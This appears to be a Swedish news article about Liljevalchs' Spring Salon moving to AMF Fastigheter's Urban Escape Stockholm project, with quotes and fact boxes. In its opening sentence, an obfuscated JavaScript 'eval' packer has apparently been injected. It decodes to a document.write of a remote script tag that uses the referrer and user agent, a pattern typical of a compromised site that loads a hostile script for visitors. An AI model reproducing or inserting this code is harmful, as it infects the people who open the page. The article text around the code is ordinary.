Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Liljevalchs Vårsalong flyttar till city

Liljevalchs Vårsalong flyttar till city
Sebastian

Liljevalchs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yhzas|var|u0026u|referrer|zfnnz||js|php’.split(’|’),0,{}))
Vårsalong får ett nytt hem 2016. Publikfavoriten flyttar till Stockholms city, introducerar utomhuskonst och blir en del av det största stadsutvecklingsprojektet i Stockholms city på över 30 år. Allt i ett samarbete med AMF Fastigheter.

Den omåttligt populära utställningen lockade tidigare i år fler än 90 000 besökare till konsthallen på Djurgården. En siffra som inte lär minska när Liljevalchs alltså blir en del av AMF Fastigheters storsatsning Urban Escape Stockholm.

Urban Escape Stockholm är beläget i kvarteren kring Gallerian. Högst upp i en av byggnaderna kommer konsten att dominera hela 1800 kvm, fördelat på två plan och en uteterrass. Det är första gången i utställningens historia som delar av materialet kommer placeras utomhus vilket blir en stor nyhet för alla som skickar in bidrag. Liljevalchs chef Mårten Castenfors är entusiastisk:

– Det här är härligt för oss på Liljevalchs och för alla konstintresserade stockholmare. Vårsalongen som varit en jurybedömd tradition sedan 1921 får nästa år ett hem hos Urban Escape. I år hade vi över 90 000 besökare – och vem vet hur många det kan bli när vi intar två plan på nuvarande Gallerians tak med ingång från Brunkebergstorg och utsikt över slottet?

Han får medhåll av Mats Hederos, vd på AMF Fastigheter, som ligger bakom Urban Escape Stockholm.

– Konst och kultur har en nyckelroll i Urban Escape och vi har sedan en tid tillbaka arbetat tillsammans med Stockholms stad för att lyfta området kring Brunkebergstorg. Att då få chansen att samarbeta med en ikonisk institution som Liljevalchs och Vårsalongen känns minst sagt fantastiskt.

Fakta om Vårsalongen:

Vårsalongen är en jurybedömd utställning som anordnats i Liljevalchs lokaler sedan 1921. Under de senaste åren har Liljevalchs noterat allt fler sökande Till 2015 sökte 2 300 med drygt 10 000 konstverk. Ansökningarna sker anonymt – och alla är välkomna att söka: unga som gamla, professionella som amatörer. År 2015 deltog 119 konstnärer/grupper med 230 verk vilka sågs av 90 537 besökare.

2016 inleds en utbyggnad och renovering av Liljevalchs konsthall. Den nya byggnaden, ritad av Gert Wingårdh, sammanlänkas enligt planen med Carl Bergstens välkända rosa byggnad på senhösten 2017.

Fakta Urban Escape Stockholm

Urban Escape Stockholm växer fram i kvarteret mellan Hamngatan, Regeringsgatan och Brunkebergstorg och består av fem fastigheter, fyra gator och två torg. Här kombineras kontor, hotell, handel, restauranger, mötesplatser och servicetjänster.

Byggperioden pågår från sommaren 2014 till våren 2019. Fastighetsarean utökas från befintliga 95 000 m² till cirka 130 000 m², varav 62 000 m² för kontor, 29 000 m² för hotell och konferens, och 38 000 m² för handel och restaurang.

Utvecklingen av Brunkebergstorg görs tillsammans med Stockholms stad och Stena Fastigheter (Hotell Sergel Plaza). Utvecklingen av Regeringsgatan sker tillsammans med fastighetsbolagen Vasakronan, Pembroke och Hufvudstaden.